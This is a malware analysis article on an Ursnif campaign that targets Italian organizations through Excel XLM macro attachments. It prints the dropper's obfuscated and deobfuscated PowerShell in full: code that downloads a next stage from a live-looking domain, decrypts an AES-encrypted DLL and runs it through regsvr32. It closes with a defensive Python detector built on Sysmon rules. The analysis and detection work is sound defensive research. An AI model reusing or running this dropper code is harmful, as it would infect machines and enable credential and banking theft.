Ursnif is one of the most widespread threats; it is delivered through malspam campaigns aimed at multiple industries across Italy and Europe.
Recently, we have identified a new variant that is targeting Italian organizations. The malspam messages use attachments with subjects like “Avviso di Pagamento_xxxx_date”, where xxxx is a number and date is a date in the format “dd-mm-yyyy” (e.g. “Avviso di Pagamento_14326_15_04_2020”). We spotted some major changes in the techniques employed by the Ursnif/ISFB droppers used in the campaign: the operators have adopted new detection-evasion techniques and introduced important changes to the Ursnif infection chain.
The variant used in the campaign against Italian organizations contains some important “upgrades” compared with other samples of the Ursnif malware family, and a significant evolution of the attack chain. First of all, the dropper uses Excel 4.0 macros (XLM macros) in an attempt to make detection by AVs harder; then it uses two different C2 servers, one of which is used only for the registration of the victim machine, identified by a UUID.
The following picture reports the Ursnif Infection chain that is used in this campaign:
Figure 1: Ursnif Infection Chain
This brand new Ursnif Italian campaign is delivered as a malicious email attachment with an XLM macro embedded into it. The static information of the dropper follows:
Hash | 5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394
Threat | Ursnif XLS document dropper
Size | 39.0 KB (39,936 bytes)
Filetype | MS Excel Spreadsheet
Brief Description | Ursnif XLS Document Dropper with malicious XLM macros embedded into it
Ssdeep | 768:Deb3eTlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0LzX74bTPuQ:DeaTlYkEIbSkKBEqEXPgsRZmbaoFhZhq
Table 1. Sample information
Once opened, the document looks like an invoice ready to be filled in and displays a “Visualizza” (“View”) button to trick victims into clicking on it. Clicking the “Visualizza” button starts the malicious infection chain designed to compromise the target machine.
Figure 2: Overview of the document
Even if the document is structurally similar to others used to spread the malware in past malspam campaigns, its content stands out.
The security notice warns that the document contains dynamic content; a deeper inspection revealed the presence of some embedded Excel 4.0 macros (XLM macros).
Figure 3: Piece of the malicious XLM Macro
The dynamic content is written in PowerShell; it is split across multiple cells and then evaluated by a defined handler:
Figure: Evidence of the Executed code
The Frame1_Layout handler is triggered when the user clicks on “Allow Content”.
Then the malicious macro is reassembled and the document prepares a window displaying a message informing the user that the document is corrupted. When the user clicks on it, the macro kills the Excel process, but the PowerShell continues its execution in the background.
The extracted macro is the Ursnif dropper; after reassembling it, it looks like the following:
sal uu New-Object; &( ([stRING]$VErBoSePRefErENce)[1,3]+’X’-JoIN”) ( uu io.compRESSiON.defLaTEstrEaM([system.Io.meMoRysTrEaM] [conVerT]::FROMbASE64StriNG( ‘ZVULU9pKFP4rOxmum60QSXhpGWYualooPlrB1tbL3ERZJSUmSJYqTfe/3+8syGPuDNkX5/GdN2OFeFKv3vktxm7VYiqHtpVXdN7Q+aHOPZ1Xde66+HRe13kNh7LO8TvSFit9YPwqUh1e5JePs/Zn7NdXEdY+vsHCOcHWzrCMvztE9L0/wOo/OZl/j8M5vk777PES+9ViqrhgrMnYHgC4pMMqPTAulZEnmNtvMBsYB4vPbxhdA7C8QiIvTi5H3YuPpFveYFUOsS6ygX/uQICA8MJRf+L9YC2S4g/XipjR9Oi/gmHGRbOQd3tBehZc9nWr3PwwT+5VlCZsEIzt276aRcnjkBXyzkIXC/nHYKxb1vlpzRI53nBxbD6fQyHElw3IqnFchdCSKuOeRabkkzOQr8ohiXiRMyzxCEuC7/F4HgEJQ3h69eqx//49xHl6BzChlSE56IQLp5v8SifSBqKOFo51f3k+Da4H/rgd9DsWPGczZ4nI00vnwb+cvOWTclX6RdGadcPjMwoEuZsJ52s7voZuaz4IPhxazpvHyBJwS3W8IPUkRWbbGDrBdy3EH7jiLy7y269pNBoW8nHQ0c6bW0hAezol1mS0zfvvFg25a5D2SQm5fUNmvXqWEBqh6nR26RkxUPh3GUD78BbIjrJvs3Uc/cDXIh+lCN+1bpV+plFi20cNx3E9T/zZ27WZMrJ0FSajdGX3E7xVOknniWKVtb3343A2JEu00C/jKJa2vWdzNebCJiUCLEmq4mgiGX/H9wu5DKQWzZlU81nCiIQsew1Odet/YSdfhKPsJXrAYT6NU5Ow4+C3bvEwyzguX3TLwzaK8DR94RvDBxn0dz9pStVBEPV0y1yb0QPeVdDtaVZ6CtX9mHlEcjMigg5Ek7SAxHE6Hgdd3aJi6nk/TGJu1es0Du/lso42IYXoiS7yf5DdS7MEqdxb2lZdmYesXCU2wEJCmlAhDMzJJJgqnVBZQX9Xw2enQLH2vctKz/NIKoJ9Z4Du87HCoqZ8fwshP4Co7P0BF/uGEOsI0vC8T3ZFepXj3hu9ySL0kfkdMaptq551kZGzhZZxJkkx+YXe9SaUJJN8JnXrb3s79xP54kIkWlORI4TrGE2CC4g6+wwbvDAGeGQOLBH2bpK/A29duqgcIfZ3Oxn1vTCKYaLtbHg3MSJL3h3VHoj1DSgIVWbS82yqTV3dBM+ml6m+efb1bXkolpnyGnxBosjnpfWUKHhoAWcv4YZ3sdMF1+VD1XxHU+FCKucbZUkcyUSZBF5ox+rIoD2SV9mm0ZCjRtQT2xvHr/uqt7L3OjPts9SmvmnkFZmxuL5UjASreGakHeG0HGZe2Qw0z1u357KZeC6oPFw9kHruavZR6waxu+ziNAFdGo5EDjIXMjwiAatbXfeJ9Dclcb3aZK/1qmBodbH8Ri8elkPHLXsMhwYFq1JnNrZIHdSwlc2FBua3CH3mhbIvpGL/SB5r4KPp6R5WaLLO0id50Cg7ZadSq6yGKpVMaGYKvci7Hla2ujnQ5Y8eJZVBHIe0nZ8V6d9JKtiJEUyQDBJqUNiIP2MXA+ZCT5MBFR5qjkkfEzj4urqq4FVcELb0JTEVY4CYGorTkEJ5ul1DN8+axgRbD1bOHetKngdp8FVa4rZaK7pe0WsMS5/Ql1Eo/wE=’ ),[iO.ComPrESsIOn.CoMPreSSioNmodE]::DEcOmPreSS )| fOReACH-ObjECT{ uu iO.StReamrEadeR( $_ ,[teXT.EnCODing]::AsCIi ) } |FoReACh-OBjecT{$_.READTOEnD() } ) |
Code snippet 1
After a first pass of deobfuscation it looks like this:
$lk64bE= [type](“{3}{7}{8}{2}{4}{11}{1}{6}{5}{10}{0}{9}” -F ‘RitH’,’OgrAP’,’URi’,’S’,’Ty.C’,’As’,’hY.H’,’YST’,’Em.sEc’,’M’,’HALgO’,’Rypt’) ; &(“{1}{0}”-f ‘et’,’S’) 1S7 ( [TyPe](“{3}{1}{2}{0}” -F ‘eNCOdING’,’TeX’,’t.’,’SysTEM.’) ) ; $9Sk2Z =[TyPE](“{1}{0}” -f ‘egEx’,’r’);${IK`oL`OS}=0;Function T`h([String] ${Hy},${G`h}=”MD5″){${Hh}=.(‘uu’) (“{0}{1}{4}{5}{3}{2}” -f’S’,’ystem.Text.Stri’,’er’,’ld’,’n’,’gBui’); $lK64BE::(“{2}{1}{0}” -f ‘e’,’reat’,’C’).Invoke(${GH}).”cOMp`UTEhA`SH”( ( .(“{0}{2}{3}{1}”-f’G’,’E’,’et-v’,’ArIaBL’) 1S7 ).VAlUE::”uT`F8″.(“{1}{0}{2}”-f’etByt’,’G’,’es’).Invoke(${H`Y}))|.(‘%’){[Void]${h`H}.(“{0}{1}”-f’App’,’end’).Invoke(${_}.(“{0}{1}” -f’ToSt’,’ring’).Invoke(“x2”))};${HH}.(“{0}{1}” -f ‘ToS’,’tring’).Invoke()};function Ht([string] ${E`E}){do{${U}=-join((97..122)|&(“{1}{0}{2}”-f ‘et-Rando’,’G’,’m’) -Count 3|.(‘%’){[char]${_}})}while((&(‘th’)(${U})) -notlike ‘*’+${e`e});return ${U}};${x`D}=(“{2}{1}{0}” -f ‘t’,’adswif’,’uplo’);${h`z}=’ass’;${Q}=2;${di}=’pw’;function Ts(${IJ}){${T`iK}=${IJ};if(${t`IK} -match 2){${Xd}=${H`z};${d`i}=”};${B`I}= $9SK2Z::(“{1}{0}”-f ‘eplace’,’r’).Invoke(${t`Ik},’\d’,${x`D});if(&(“{2}{4}{1}{0}{3}” -f ‘ecti’,’onn’,’T’,’on’,’est-C’) (${BI}+${D`I}) -Count 1 -quiet){${bi}=”+’ht’+’tp’+(“{1}{0}”-f’/’,’s:/’)+${bi}+${dI}+’/’+${B`i}.(“{1}{2}{0}”-f’ring’,’Sub’,’st’).Invoke(${q}, ${Q})}else{${b`I}=${q}};return ${B`i}};${e}=@((“{0}{1}”-f’new1′,’.’),”);function k`N{${LP}=’2al’+(&(‘ht’)((“{0}{1}” -f ‘*’,’6e1d’)))+(“{1}{0}” -f ‘.’,’ail’)+(.(‘ht’)((“{1}{0}”-f ‘b’,’*95f’)));return .(‘ts’)(${Lp})};${X`q}=.(‘tS’)(${E}[0]);if(${x`Q} -eq ${Q}){${X`Q}=&(‘Kn’)};${y}=.(‘uu’) (“{1}{0}{2}” -f’bC’,’Net.We’,’lient’);${y}.”He`AdeRs”.(“{1}{0}”-f’dd’,’A’).Invoke((“{0}{1}{2}” -f ‘Us’,’er-A’,’gent’), ((“{16}{0}{24}{32}{7}{9}{31}{1}{20}{6}{22}{4}{5}{30}{8}{17}{25}{29}{21}{11}{13}{26}{15}{3}{10}{18}{28}{19}{12}{23}{27}{14}{2}”-f ‘ozi’,’64; x64) AppleW’,’62’,’8.102 ‘,’7.’,’36 (‘,’it/5’,’0 
(‘,’H’,’Window’,’Saf’,’Ge’,’7′,’c’,’183′,’hrome/70.0.353′,’M’,’T’,’ari’,’3′,’ebK’,’ ‘,’3′,’.36 Edge/’,’lla/’,’ML, ‘,’ko) C’,’18.’,’/5′,’like’,’K’,’s NT 10.0; Win’,’5.’)));${y}.(“{4}{0}{3}{1}{2}”-f’own’,’stri’,’ng’,’load’,’D’).Invoke(${Xq})|.( ([String]”.”ReM`o`Ve”)[45,12,27]-Join”) |
Code Snippet 2
The dropper uses Base64 encoding, format-string substitution (the sequences of multiple ‘{}’ placeholders filled through the -f operator) and mixed-case string capitalization (sequences of upper and lower case letters).
Once the macro is executed, the dropper contacts the newuploadswift[.]pw domain to download the next-stage payload and executes it with the PowerShell engine. The downloaded stage looks like the following:
&((gV ‘*MDr*’).nAme[3,11,2]-JOiN”)( uu IO.strEaMREaDeR(( uu io.comPRESSiON.DeflATeSTrEaM([SYStEM.io.MeMORysTrEAM][cONVert]::FrOmBASe64STRinG( ‘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’), [iO.COmPREsSioN.coMprEssIOnmoDe]::dEcoMPrEss )) , [TexT.EncOdINg]::asciI) ).ReADtoenD( ) |
Code snippet 3
After de-obfuscating it, the PowerShell code becomes:
function SDfiwe(${T`T}){${T`hL}=[regex]::(“{2}{0}{1}”-f ‘epl’,’ace’,’r’).Invoke(${tt},’\d’,”);return ${t`hl}};function YwE(${T`e}){${i`I}=[Convert]::(“{0}{3}{2}{4}{1}” -f’F’,’tring’,’e64′,’romBas’,’S’).Invoke(${t`E});return ${Ii}};&(“{1}{0}”-f’l’,’sa’) Vu new-object;${l`LA}=$(&(“{0}{2}{3}{1}”-f’get-‘,’object’,’wm’,’i’) Win32_ComputerSystemProduct -computername . | &(“{0}{2}{1}”-f’Select-‘,’ject’,’Ob’) -ExpandProperty UUID);${a`Zq}=${ENV`:tE`mP};${f`Bf}=(${d}=&(“{0}{1}” -f’gc’,’i’) ${a`zq}|&(“{1}{0}{2}”-f ‘d’,’get-ran’,’om’)).”na`mE” -replace “.{5}$”;${M`K}=(&(“{1}{0}”-f ‘i’,’Gc’) -path (((${A`zQ}.(“{0}{2}{1}” -f ‘to’,’ring’,’st’).Invoke()))) | &(“{2}{3}{0}{1}”-f ‘e-Obj’,’ect’,’W’,’her’) { ${_}.”pSis`cON`TAiner” }|.(“{2}{1}{0}”-f ‘lect’,’e’,’s’) fullname |.(“{1}{0}{2}”-f’ndo’,’Get-Ra’,’m’) -count 1).”FulLn`A`Me”+’\’+${f`BF}+’.’;function NiLL(${T`yO}){${k`j}=.(‘Vu’) IO.MemoryStream(,${t`yO});${m`m}=(.(‘Vu’) IO.StreamReader(&(‘Vu’) IO.Compression.GzipStream(${k`J},[IO.Compression.CompressionMode]::”d`ECO`mPrESs”))).(“{1}{2}{0}”-f ‘nd’,’ReadT’,’oE’).Invoke();return ${M`M}};&(“{0}{1}” -f ‘s’,’al’) msq regsvr32;${S`U}=’using System;using System.Security.Cryptography;using System.Text;public class Af{public static byte[] mol(byte[] kk, string lj){byte[] jik = new UTF8Encoding().GetBytes(lj);Aes AESImplementation = Aes.Create(“AES”);AESImplementation.Key = jik;AESImplementation.Mode = CipherMode.ECB;ICryptoTransform CryptoTransform = AESImplementation.CreateDecryptor();return CryptoTransform.TransformFinalBlock(kk, 0, kk.Length);}public static byte[] cer(string kk, string lj){return mol(Convert.FromBase64String(kk), lj);}public static string fte(byte[] kk, string lj){return new UTF8Encoding().GetString(mol(kk, lj));}public static string fte(string kk, string lj){return new UTF8Encoding().GetString(cer(kk, lj));}}’;.(“{0}{1}”-f’A’,’dd-Type’) -TypeDefinition ${su};function osi{${M}=${x`Q}+${q}+’?’+${L`LA};.(‘Sv’) 8 ${m};&(‘SV’) t0L (“{2}{3}{0}{1}”-f 
‘ie’,’nt’,’Net’,’.WebCl’);.(‘Si’) Variable:B (&(‘Vu’) (&(“{0}{1}” -f ‘I’,’tem’) Variable:\t0L).”v`ALUe”);.(‘Sv’) D (“{2}{0}{1}” -f’adDa’,’ta’,’Downlo’);${f`DS}=(([byte[]](&(‘Gv’) B -Value).((&(‘LS’) Variable:D).”Va`LUE”).”IN`VOke”((&(‘GI’) Variable:8).”vAL`Ue”)));return &(“{0}{1}”-f ‘Ni’,’LL’)(${F`ds})};function kelv{${Fd}=&(“{1}{0}” -f ‘i’,’os’);${fd}=[Af]::(“{1}{0}”-f’e’,’ft’).Invoke(${Fd},${l`lA}.(“{2}{0}{1}”-f’ubstrin’,’g’,’s’).Invoke(0,16));${U}=${FD}.(“{1}{2}{0}” -f ‘tring’,’su’,’bs’).Invoke(0,1);${e`F}=${F`D}.(“{1}{0}”-f ’emove’,’r’).Invoke(0,1);${O`O}=${e`F} -split’!’;${vr}=[Text.Encoding]::”Ut`F8″;foreach(${O} in ${oO}[0]){${o`UT}=@();${O`A}=${U}.(“{0}{1}{2}”-f’ToCharArr’,’a’,’y’).Invoke();${o}=&(“{1}{0}” -f ‘wE’,’Y’)(${O});for(${I}=0; ${i} -lt ${O}.”c`oUnT”; ${I}++){${o`Ut} += [char]([Byte]${O}[${i}] -bxor[Byte]${OA}[${I}%${o`A}.”COU`NT”])}};${SS}=${e`F}.”rep`lA`ce”((${o`O}[0]+”!”),${v`R}.”gE`TSTr`i`NG”(${O`UT}));return ${SS}};function gb{${k`I}=&(“{1}{0}”-f’lv’,’ke’);[io.file]::(“{0}{2}{1}”-f’Write’,’tes’,’AllBy’).Invoke(${m`K},(.(“{1}{0}” -f ‘E’,’Yw’)(${ki} -replace “.{200}$”)));if((&(“{1}{0}”-f ‘ci’,’g’) ${mk}).”Len`GtH” -lt 512){exit};&(“{0}{1}”-f’ms’,’q’) -s ${mK};.(“{0}{1}” -f’sle’,’ep’) 15;.(‘sl’);[io.file]::(“{2}{1}{0}” -f’ines’,’llL’,’WriteA’).Invoke(${m`k},(&(“{1}{0}”-f’Dfiwe’,’S’)(${l`LA})))};&(‘gb’) |
Code Snippet 4
At this point it is necessary to highlight a particular trick adopted by the malware to make each infection unique on the machine: in the previous code snippet we have seen the retrieval of the machine's UUID, which is passed to the same C2 as a parameter of the next GET request. If the same UUID is sent a second time, the server replies with an empty body. If the UUID is sent to the server for the first time, it instead provides the next stage of the infection, as shown in Figure 4.
Figure 4: Piece of the encrypted DLL downloaded from the DropURL
As seen in the previous figure, the body of the response is encrypted. It is decrypted by the AES routine shown in Code Snippet 4 (highlighted in red) and then executed through the “regsvr32.exe” process.
The payload is as follows:
Hash | e32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0
Threat | Ursnif Loader
Size | 289.50 KB (296,448 bytes)
Filetype | DLL
Brief Description | Ursnif Loader able to inject in memory
Ssdeep | 6144:ydLG0cc+HXn8zAzaFVqG9aldc3w0QBA8Ys36cMsu+a:y5GjsEzaKG4XcLs3isu+a
Imphash | f11ff0b8c499af0d98f00299b97339cf
Table 2. Sample information
This component is the loader for the Ursnif payload. As a persistence mechanism, it writes the following registry key at the path “HKCU\Software\AppDataLow\Software\Microsoft\Microsoft\[RANDOMID]”:
Figure 5: Registry key evidence
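The behaviours described so far (Excel spawning PowerShell, regsvr32 silently registering a DLL from the user's temporary directory, and a value written under HKCU\Software\AppDataLow\Software\Microsoft\) are each visible in endpoint telemetry. The following Python detector is an added example, not part of the original analysis: it runs three such rules over constructed Sysmon-style JSON lines (process creation as EventID 1, registry value set as EventID 13) and returns the matching evidence. The field names follow Sysmon's conventions; the SID, user name and file names are placeholders; and the child-process list includes a few script hosts beyond PowerShell, which goes slightly beyond what this campaign uses.

```python
import json
import re
from typing import Callable, Dict, List, Optional, Tuple

# Sysmon writes HKCU keys as HKU\<SID>\..., so match on the path tail only.
APPDATALOW_RE = re.compile(r"\\Software\\AppDataLow\\Software\\Microsoft\\", re.IGNORECASE)
TEMP_PATH_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)   # %TEMP% under a profile
SILENT_FLAG_RE = re.compile(r"(?i)(^|\s)[-/]s(\s|$)")                     # regsvr32 -s / /s

OFFICE_APPS = {"excel.exe", "winword.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe", "regsvr32.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawned_shell(ev: Dict) -> Optional[str]:
    """Office application as parent of a script host: the XLM macro handing off to PowerShell."""
    if ev.get("EventID") != 1:
        return None
    parent, child = _basename(ev.get("ParentImage", "")), _basename(ev.get("Image", ""))
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        return f"{parent} spawned {child}"
    return None


def appdatalow_persistence(ev: Dict) -> Optional[str]:
    """Registry value set under the AppDataLow\Software\Microsoft path the loader uses."""
    if ev.get("EventID") != 13:
        return None
    target = ev.get("TargetObject", "")
    return target if APPDATALOW_RE.search(target) else None


def regsvr32_temp_dll(ev: Dict) -> Optional[str]:
    """regsvr32 registering a DLL from the temp directory with the silent flag."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image", "")) != "regsvr32.exe":
        return None
    cmd = ev.get("CommandLine", "")
    return cmd if TEMP_PATH_RE.search(cmd) and SILENT_FLAG_RE.search(cmd) else None


RULES: Dict[str, Callable[[Dict], Optional[str]]] = {
    "office_spawned_shell": office_spawned_shell,
    "appdatalow_persistence": appdatalow_persistence,
    "regsvr32_temp_dll": regsvr32_temp_dll,
}


def scan_events(jsonl: str) -> List[Tuple[str, str]]:
    """Run every rule over each JSON line; return (rule name, evidence) pairs in event order."""
    hits: List[Tuple[str, str]] = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        for name, rule in RULES.items():
            evidence = rule(ev)
            if evidence:
                hits.append((name, evidence))
    return hits


# Constructed events (placeholder SID, user and file names); two are benign controls.
SAMPLE_EVENTS = r"""
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","CommandLine":"powershell -c <constructed>"}
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell"}
{"EventID":13,"TargetObject":"HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\AppDataLow\\Software\\Microsoft\\Microsoft\\RANDOMID-PLACEHOLDER","Details":"Binary Data"}
{"EventID":1,"Image":"C:\\Windows\\System32\\regsvr32.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"regsvr32 -s C:\\Users\\alice\\AppData\\Local\\Temp\\randm.dll"}
{"EventID":1,"Image":"C:\\Windows\\System32\\regsvr32.exe","ParentImage":"C:\\Windows\\System32\\msiexec.exe","CommandLine":"regsvr32 /s C:\\Program Files\\Vendor\\vendor.dll"}
"""

if __name__ == "__main__":
    for name, evidence in scan_events(SAMPLE_EVENTS):
        print(f"{name}: {evidence}")
```

Each rule on its own produces noise in a real estate (software installers also call regsvr32 /s, and PowerShell is launched from Office by legitimate add-ins), so the value lies in correlating the three hits on one host within a short window, which is exactly the sequence this dropper produces.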
As in the classic Ursnif infection, it sends the configuration string to the C2 encoded in Base64 and encrypted with the Serpent algorithm. There are two ways to retrieve the configuration string: the first is to decrypt it from the request sent to the C2, decrypting the Serpent ciphertext with the key extracted from the process memory; the second is to look for the configuration string inside the process. In the end, the configuration of this Ursnif campaign is the following:
k=kjrisau&soft=1&version=214131&user=92bdf642cd2b24f71ccbae351ccb9aa9&server=12&id=4444&crc=ef267149&uptime=12089&ip=*.*.*.*
With our previous analyses we have tracked the evolution of Ursnif TTPs over time. Some of the techniques used by the malware are evolving rapidly, especially in the direction of evasion and anti-analysis.
This Italian campaign, while maintaining the characteristics and capabilities of recent ones, uses XLM macros to lower detection by AVs, and two different C2 servers, one of which is dedicated to tracking each infection through a unique UUID. This mechanism allows the operators to better track the return on investment of the malicious campaign.
Additional details, including Indicators of Compromise (IoCs) and Yara rules, are reported in the analysis published by Yoroi:
https://yoroi.company/research/a-brand-new-ursnif-isfb-campaign-targets-italian-organizations/
(SecurityAffairs – Ursnif, malware)